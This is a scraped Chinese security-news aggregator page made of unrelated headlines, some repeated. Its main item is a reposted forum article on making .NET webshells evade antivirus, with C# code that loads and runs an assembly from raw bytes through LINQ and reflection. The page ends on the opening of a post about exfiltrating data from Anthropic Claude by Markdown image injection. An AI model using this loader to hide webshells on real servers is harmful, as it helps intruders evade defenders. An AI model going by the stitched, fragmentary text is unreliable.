Aggregator
[下班充电计划]JAVA基础知识补全-JVM|字节码|JNA|JNR|JNI|JMX
A CEO’s Perspective: Data Transfer Is the Silent Killer
分享一篇不错的.NET Webshell免杀文章
原文出自这里
笔者加载位于当前执行程序所在目录下的 "net-calc.dll" 文件的字节码内容,内容很简单启动一个新进程弹出计算器,并将其存储在 assemblyBytes变量,代码如下
byte[] assemblyBytes = File.ReadAllBytes(Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "net-calc.dll"));
List<byte[]> data = new List<byte[]>();
data.Add(this.assemblyBytes);
var e1 = data.Select(Assembly.Load);
Func<Assembly, IEnumerable> map_type = (Func<Assembly, IEnumerable>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance).ToList();
然后使用LINQ-SelectMany操作符合并两个序列后产生一个新的序列结果,通过LINQ这个能力可以联合Aseembly.Load和Aseembly::GetTypes,再借用LINQ-Select操作符投影Activator.CreateInstance反射创建一个Aseembly对象,这样就可以实现命令执行

实际场景下这种加载外部文件的方式不太友好,我们知道Assembly.Load有多个重载方法,其中有一个重载支持byte[]类型的参数,如此我们可以通过System.IO.File.ReadAllBytes方法读取文件字节码
byte[] assemblyBytes = {0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8 .......... }
运行时如下图

不能上传附件,工具无法传上来
1 个帖子 - 1 位参与者
[下班充电计划]JAVA基础知识补全-JVM|字节码|JNA|JNR|JNI|JMX
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
开房疯狂打Call:警惕利用固定电话实施的电信网络诈骗
Will the real Citrix CVE-2023-3519 please stand up?
How to Leverage GreyNoise in Your SOAR Playbooks
Protect Every API Anywhere with API Security
邮件钓鱼之sendcloud邮件伪造 - PaperPen
近源渗透之Crazyradio无线键鼠攻击利用 - PaperPen
漏洞分析|Adobe ColdFusion 序列化漏洞(CVE-2023-29300)
Anthropic Claude Data Exfiltration Vulnerability Fixed
A common attack vector that LLM apps face is data exfiltration, in particular data exfiltration via Image Markdown Injection is a common vulnerability. Microsoft fixed the vulnerability in Bing Chat, ChatGPT is still vulnerable as Open AI “won’t fixed” the issue, and Anthropic just mitigated this vulnerability in Claude.
This post documents the Anthropic Claude data exfiltration vulnerability and the mitigation put in place.
The Vulnerability - Image Markdown InjectionAs a quick recap, imagine a large language model (LLM) returns the following text: